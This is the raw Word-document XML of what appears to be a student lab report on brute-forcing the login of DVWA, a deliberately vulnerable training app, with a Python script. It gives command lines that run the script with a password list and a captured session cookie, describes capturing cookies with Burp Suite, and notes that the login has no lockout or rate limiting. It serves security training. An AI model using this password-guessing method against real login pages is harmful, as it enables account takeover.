    <w:p w14:paraId="7A2905DB" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Added a 5th optional argument for cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D29E91" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>cookies: A dictionary containing session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519EBD4" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>If no cookies are provided, the script defaults to None.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7904F9" w14:textId="60E8ABC5" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="0081598B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C09FF2" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Without Cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4D86F" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="0081598B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>python bruteforce2.py http://10.0.2.5/dvwa/login.php admin passwords.txt "Login failed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB00C24" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>With Cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE978B" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="0081598B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>python bruteforce2.py http://10.0.2.5/dvwa/login.php admin passwords.txt "Login failed</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>" "{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'PHPSESSID': 'abc123', 'security': 'low'}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198A0DE" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27601162" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Cookies are passed with the POST request if provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35E3D8" w14:textId="24F0BB1C" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>requests.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>, data=data, cookies=cookies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677281F9" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1299D" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Ensures</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies are provided in a valid dictionary format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6450C" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Handles invalid or missing cookie values gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23D578" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brute Forcing Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1F276" w14:textId="1D3F7653" w:rsidR="00661716" w:rsidRDefault="00E01E33" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Same as Task 1 but includes cookie handling for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69A120" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491631DF" w14:textId="789686A4" w:rsidR="00661716" w:rsidRDefault="00661716" w:rsidP="004D5DA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00661716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B838DD" wp14:editId="5BA6A14B">
            <wp:extent cx="5943600" cy="2466975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="86698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870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F639" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CD774" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Captured Cookies Using Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982429A" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Opened Burp Suite and set Firefox to route traffic through Burp's proxy (127.0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:8080).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541D008" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Intercepted a login attempt to DVWA and captured the cookie values (e.g., PHPSESSID, security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6A4B0" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modified the Script</w:t>
      </w:r>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78CF5A" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Added an optional argument to accept cookies as a dictionary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB77A40" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Integrated cookies into the POST request logic using the requests library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD9B8D3" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tested the Script</w:t>
      </w:r>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E944CBE" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Ran the script with and without cookies at different DVWA security levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5109EA" w14:textId="77777777" w:rsidR="0081598B" w:rsidRPr="0081598B" w:rsidRDefault="0081598B" w:rsidP="0081598B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Verified the results and behavior using Burp Suite to observe server responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210E8F7" w14:textId="77777777" w:rsidR="00661716" w:rsidRDefault="00661716" w:rsidP="004D5DA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B2418B" w14:textId="0430B10E" w:rsidR="001D65D1" w:rsidRDefault="00661716" w:rsidP="00E01E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00661716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E43F6DA" wp14:editId="5008BC1B">
            <wp:extent cx="5931877" cy="1362159"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="86233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7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3706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1B48" w14:textId="4E24A692" w:rsidR="001D65D1" w:rsidRDefault="001D65D1" w:rsidP="004D5DA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D65D1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F1701D5" wp14:editId="3495D81A">
            <wp:extent cx="5943600" cy="1605915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="173857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773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7E39" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CFFF16" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>The script works at all security levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79D98A" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>However, DVWA’s high security does not enforce protections like CAPTCHA, rate limiting, or account lockouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B6836" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Cookies, while supported, are not strictly necessary due to DVWA’s incomplete security mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536167A5" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="005B651E" w:rsidRDefault="00E01E33" w:rsidP="004D5DA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E01E33" w:rsidRPr="005B6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5546B" w14:textId="77777777" w:rsidR="00275B01" w:rsidRDefault="00275B01" w:rsidP="0081598B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37FD3A5E" w14:textId="77777777" w:rsidR="00275B01" w:rsidRDefault="00275B01" w:rsidP="0081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51FC3" w14:textId="77777777" w:rsidR="00275B01" w:rsidRDefault="00275B01" w:rsidP="0081598B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F03B73A" w14:textId="77777777" w:rsidR="00275B01" w:rsidRDefault="00275B01" w:rsidP="0081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B9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D209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881"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F20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E79F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80E2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0808"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="722680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268A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E81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E279D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5BE8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C69F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="066218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F3D20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5092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242DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="258C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B4C09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="809C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E1D16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1174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16A33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="754A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65CC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CAFE1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F74F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C1AAB4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F33A1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="021C6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64295"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="041A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F5984"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3C2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27DB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C71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720E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F20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5158B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D62C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21F81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC30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C205D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C5A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0520E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E1A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E0ADE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="129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F15E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2BC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008079">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2129421526">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="973296994">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="823814313">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="257761584">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1977832092">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1546019682">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1057587006">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="752972893">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="774716281">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="36929111">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1852256729">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1848136922">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="486438386">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1462768483">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1159342424">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1716389600">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1628119650">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1620647664">
    <w:abstractNumId w:val="14"/>
  </w:num>
